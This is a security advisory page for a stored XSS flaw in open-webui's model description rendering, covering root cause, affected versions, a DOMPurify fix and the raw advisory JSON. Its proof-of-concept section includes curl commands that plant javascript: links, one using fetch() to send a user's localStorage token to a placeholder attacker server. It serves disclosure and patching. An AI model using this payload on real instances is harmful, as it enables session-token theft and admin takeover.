Vulnerability-Lookup

Search criteria

Vendor

Product

Assigner

Sources

Sort by

Order

Apply ordering (override relevance)

Related vulnerabilities

GHSA-GF5M-WCRH-7928

Vulnerability from github – Published: 2026-05-08 19:00 – Updated: 2026-05-08 19:00

Summary

open-webui Vulnerable to Stored XSS via Model Description

Details

[!IMPORTANT] Relationship to CVE-2024-7990

CVE-2024-7990 (issued by huntr.dev, March 2025) describes a stored XSS in the same field — the model description — but exploits a different bypass mechanism: a second-order injection through the sanitizeResponseContent function's video-tag placeholder restoration logic in v0.3.x. That bypass was closed in v0.4.0 by removing the video exemption from the sanitizer.

The vulnerability described in this advisory is structurally distinct: a markdown-link payload with a javascript: URI passes through sanitizeResponseContent unchanged (no angle brackets), is then parsed by marked.parse() into an <a href="javascript:..."> element, and rendered live by {@html}. This is a pipeline-ordering flaw where the dangerous construct is introduced after sanitization completes. Removing the video exemption has no effect on this primitive.

Affected range: v0.3.5 through v0.8.12 inclusive. Fixed in: v0.9.0 (commit 5eab125, which wraps marked.parse() output in DOMPurify.sanitize).

Both vulnerabilities are independently fixable under CVE rule 4.2.11. CVE assignment for this advisory has been requested separately on that basis.

Summary

This is a stored cross-site scripting (XSS) vulnerability that allows any authenticated user with model creation permission (workspace.models) to execute arbitrary JavaScript in the browser of any other user (including admins) who views the malicious model in the chat UI.

Details

Root Cause: Model descriptions are rendered in two Svelte components via this chain: sanitizeResponseContent(description) → .replaceAll('\n', '<br>') → marked.parse() → {@html ...}

The model description is stored in the database without prior sanitization. Then uses this sanitization function before applying the results to the description.

index.ts:82-92

export const sanitizeResponseContent = (content: string) => {
    return content
        .replace(/<\|[a-z]*$/, '')       // strip incomplete <|tokens
        .replace(/<\|[a-z]+\|$/, '')     // strip incomplete <|token| 
        .replace(/<$/, '')               // strip trailing <
        .replaceAll('<', '&lt;')         // escape < to &lt;
        .replaceAll('>', '&gt;')         // escape > to &gt;
        .replaceAll(/<\|[a-z]+\|>/g, ' ') // strip <|token|> patterns
        .trim();
};

This function was designed to sanitize HTML tags, but does not take into consideration that XSS can be triggered via javascript: which is the fundamental issue.

.replaceAll('\n', '<br>') will replace newlines with <br> tags, and since payload can be written without newlines, its unaffected.

marked sees [text](url) and generated an anchor tag and does not block the payload of javascript:.

Svelte's {@html} directive inserts raw HTML into the DOM without escaping, creating the vulnerability.

Affected files: src/lib/components/chat/Placeholder.svelte (lines 177–181) src/lib/components/chat/ChatPlaceholder.svelte (lines 99–103)

PoC

Below is a simple PoC that will create a model with a description to trigger an alert when pressing on the hyperlink. Replace the values inside such as HOST and TOKEN with your own values using your own test server.

Step 1 - Create a model with a malicious description. The token used must be from an account with either the following. A. Admin privileges B. An account with model creation permission

curl -X POST 'http://<HOST>/api/v1/models/create' \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "id": "xss-test",
    "name": "Helpful Assistant!",
    "base_model_id": "llama3",
    "meta": {
      "description": "A helpful AI assistant. [Click here for docs](javascript:alert())"
    },
    "params": {}
  }'

Any authenticated user with workspace.models permission can execute this. The base_model_id should reference any model available on the instance.

Step 2 - Select the model:

Step 3 - XSS Triggers:

Click on the hyperlink and watch the alert trigger.

Below is a PoC that steals the access token from localstorage

Step 1 - Setup a local python HTTPServer

python3 -m http.sever 8080

Step 2 - Create a model with a malicious payload to steal the token from localstorage

curl -X POST 'http://<HOST>/api/v1/models/create' \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "id": "xss-model",
    "name": "Token Stealer",
    "base_model_id": "llama3",
    "meta": {
      "description": "Advanced research model. [View benchmarks](javascript:void(fetch(`http://<MALICIOUS_SERVER_IP>:8080/?t=${localStorage.token}`)))"
    },
    "params": {}
  }'

Step 3 - Navigate to the malicious model and click on the hyperlink

Check on the local server you have set up in Step 1 and see that the token is returned within the URL.

Impact

As user's session is stored in LocalStorage, attacker can craft a malicious payload that reads the contents and sends it to their malicious server. Once an admin access token has been stolen, users can create a new tool to execute arbitrary code (feature of Open-WebUI).

Attack Scenario

1. Attacker creates a model with a malicious description
2. Victim selects model and clicks the hyperlink
3. Victim authorization token is stolen

This vulnerability affects all Open-WebUI users.

Remediation

Recommended fix — wrap marked.parse() output with DOMPurify.sanitize().

In the affected files, change

{@html marked.parse(
    sanitizeResponseContent(description).replaceAll('\n', '<br>')
)}

into

{@html DOMPurify.sanitize(
    marked.parse(
        sanitizeResponseContent(description).replaceAll('\n', '<br>')
    )
)}

This matches the pattern already used in other parts of the application such as but not limiting to ConfirmDialog.svelte:130 and NotebookView.svelte:77. DOMPurify will handle the stripping of javascript: URIs, event handlers and other dangerous HTML by default.

AI Disclosure

Claude was used to assist in:

Systematic codebase searching to identify unsanitized {@html} rendering paths Verifying marked@9.1.6 behavior with javascript: URIs

Credits

Lin, WeiChi from Sompo Holdings, Inc.

Severity ?

7.3 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.12"
      },
      "package": {
        "ecosystem": "npm",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.12"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44721"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T19:00:28Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "\u003e [!IMPORTANT]\n\u003e  Relationship to CVE-2024-7990\n\n\u003e CVE-2024-7990 (issued by huntr.dev, March 2025) describes a stored XSS in the same field \u2014 the model description \u2014 but exploits a different bypass mechanism: a second-order injection through the sanitizeResponseContent function\u0027s video-tag placeholder restoration logic in v0.3.x. That bypass was closed in v0.4.0 by removing the video exemption from the sanitizer.\n\nThe vulnerability described in this advisory is structurally distinct: a markdown-link payload with a javascript: URI passes through sanitizeResponseContent unchanged (no angle brackets), is then parsed by marked.parse() into an `\u003ca href=\"javascript:...\"\u003e` element, and rendered live by `{@html}`. This is a pipeline-ordering flaw where the dangerous construct is introduced after sanitization completes. Removing the video exemption has no effect on this primitive.\n\nAffected range: v0.3.5 through v0.8.12 inclusive. Fixed in: v0.9.0 (commit 5eab125, which wraps marked.parse() output in DOMPurify.sanitize).\n\nBoth vulnerabilities are independently fixable under CVE rule 4.2.11. CVE assignment for this advisory has been requested separately on that basis.\n\n### Summary\n\nThis is a stored cross-site scripting (XSS) vulnerability that allows any authenticated user with model creation permission (workspace.models) to execute arbitrary JavaScript in the browser of any other user (including admins) who views the malicious model in the chat UI.\n\n### Details\n\nRoot Cause:\nModel descriptions are rendered in two Svelte components via this chain:\n`sanitizeResponseContent(description)  \u2192  .replaceAll(\u0027\\n\u0027, \u0027\u003cbr\u003e\u0027)  \u2192  marked.parse()  \u2192  {@html ...}`\n\nThe model description is stored in the database without prior sanitization. Then uses this sanitization function before applying the results to the description.\n\n`index.ts:82-92`\n```ts\nexport const sanitizeResponseContent = (content: string) =\u003e {\n    return content\n        .replace(/\u003c\\|[a-z]*$/, \u0027\u0027)       // strip incomplete \u003c|tokens\n        .replace(/\u003c\\|[a-z]+\\|$/, \u0027\u0027)     // strip incomplete \u003c|token| \n        .replace(/\u003c$/, \u0027\u0027)               // strip trailing \u003c\n        .replaceAll(\u0027\u003c\u0027, \u0027\u0026lt;\u0027)         // escape \u003c to \u0026lt;\n        .replaceAll(\u0027\u003e\u0027, \u0027\u0026gt;\u0027)         // escape \u003e to \u0026gt;\n        .replaceAll(/\u003c\\|[a-z]+\\|\u003e/g, \u0027 \u0027) // strip \u003c|token|\u003e patterns\n        .trim();\n};\n```\nThis function was designed to sanitize HTML tags, but does not take into consideration that XSS can be triggered via `javascript:` which is the fundamental issue.\n\n`.replaceAll(\u0027\\n\u0027, \u0027\u003cbr\u003e\u0027)` will replace newlines with `\u003cbr\u003e` tags, and since payload can be written without newlines, its unaffected.\n\n`marked` sees `[text](url)` and generated an anchor tag and does not block the payload of `javascript:`.\n\nSvelte\u0027s `{@html}` directive inserts raw HTML into the DOM without escaping, creating the vulnerability.\n\nAffected files:\n`src/lib/components/chat/Placeholder.svelte` (lines 177\u2013181)\n`src/lib/components/chat/ChatPlaceholder.svelte` (lines 99\u2013103)\n\n\n### PoC\n\nBelow is a simple PoC that will create a model with a description to trigger an alert when pressing on the hyperlink. Replace the values inside such as HOST and TOKEN with your own values using your own test server.\n\nStep 1 - Create a model with a malicious description. The token used must be from an account with either the following.\nA. Admin privileges\nB. An account with model creation permission\n\n```bash\ncurl -X POST \u0027http://\u003cHOST\u003e/api/v1/models/create\u0027 \\\n  -H \u0027Authorization: Bearer \u003cTOKEN\u003e\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\n    \"id\": \"xss-test\",\n    \"name\": \"Helpful Assistant!\",\n    \"base_model_id\": \"llama3\",\n    \"meta\": {\n      \"description\": \"A helpful AI assistant. [Click here for docs](javascript:alert())\"\n    },\n    \"params\": {}\n  }\u0027\n```\nAny authenticated user with workspace.models permission can execute this. The base_model_id should reference any model available on the instance.\n\nStep 2 - Select the model:\n\nLogin and select the created model, if you followed the PoC it will be Helpful Asisstant!\n\u003cimg width=\"1203\" height=\"718\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d649c727-276c-4011-8234-140c51a32b68\" /\u003e\n\nStep 3 - XSS Triggers:\n\nClick on the hyperlink and watch the alert trigger.\n\u003cimg width=\"1203\" height=\"718\" alt=\"image\" src=\"https://github.com/user-attachments/assets/289fc3d4-e09a-45a4-b83d-40984d47a760\" /\u003e\n\n**Below is a PoC that steals the access token from localstorage**\n\nStep 1 - Setup a local python HTTPServer\n\n`python3 -m http.sever 8080`\n\nStep 2 - Create a model with a malicious payload to steal the token from localstorage\n\n```bash\ncurl -X POST \u0027http://\u003cHOST\u003e/api/v1/models/create\u0027 \\\n  -H \u0027Authorization: Bearer \u003cTOKEN\u003e\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\n    \"id\": \"xss-model\",\n    \"name\": \"Token Stealer\",\n    \"base_model_id\": \"llama3\",\n    \"meta\": {\n      \"description\": \"Advanced research model. [View benchmarks](javascript:void(fetch(`http://\u003cMALICIOUS_SERVER_IP\u003e:8080/?t=${localStorage.token}`)))\"\n    },\n    \"params\": {}\n  }\u0027\n```\nStep 3 - Navigate to the malicious model and click on the hyperlink\n\nCheck on the local server you have set up in Step 1 and see that the token is returned within the URL.\n\u003cimg width=\"669\" height=\"50\" alt=\"image\" src=\"https://github.com/user-attachments/assets/7933e855-cc0a-40f5-a443-5c0363b1b8fa\" /\u003e \n\n\n### Impact\n\nAs user\u0027s session is stored in LocalStorage, attacker can craft a malicious payload that reads the contents and sends it to their malicious server. Once an admin access token has been stolen, users can create a new tool to execute arbitrary code (feature of Open-WebUI).\n\nAttack Scenario \n```\n1. Attacker creates a model with a malicious description\n2. Victim selects model and clicks the hyperlink\n3. Victim authorization token is stolen\n```\nThis vulnerability affects all Open-WebUI users.\n\n### Remediation\n\nRecommended fix \u2014 wrap `marked.parse()` output with `DOMPurify.sanitize()`.\n\nIn the affected files, change\n\n```ts\n{@html marked.parse(\n    sanitizeResponseContent(description).replaceAll(\u0027\\n\u0027, \u0027\u003cbr\u003e\u0027)\n)}\n```\n\ninto\n\n```ts\n{@html DOMPurify.sanitize(\n    marked.parse(\n        sanitizeResponseContent(description).replaceAll(\u0027\\n\u0027, \u0027\u003cbr\u003e\u0027)\n    )\n)}\n```\nThis matches the pattern already used in other parts of the application such as but not limiting to `ConfirmDialog.svelte:130` and `NotebookView.svelte:77`. DOMPurify will handle the stripping of `javascript:` URIs, event handlers and other dangerous HTML by default.\n\n### AI Disclosure\n\nClaude was used to assist in:\n\nSystematic codebase searching to identify unsanitized `{@html}` rendering paths\nVerifying `marked@9.1.6` behavior with `javascript:` URIs\n\n## Credits\n\nLin, WeiChi from Sompo Holdings, Inc.",
  "id": "GHSA-gf5m-wcrh-7928",
  "modified": "2026-05-08T19:00:28Z",
  "published": "2026-05-08T19:00:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-gf5m-wcrh-7928"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "open-webui Vulnerable to Stored XSS via Model Description"
}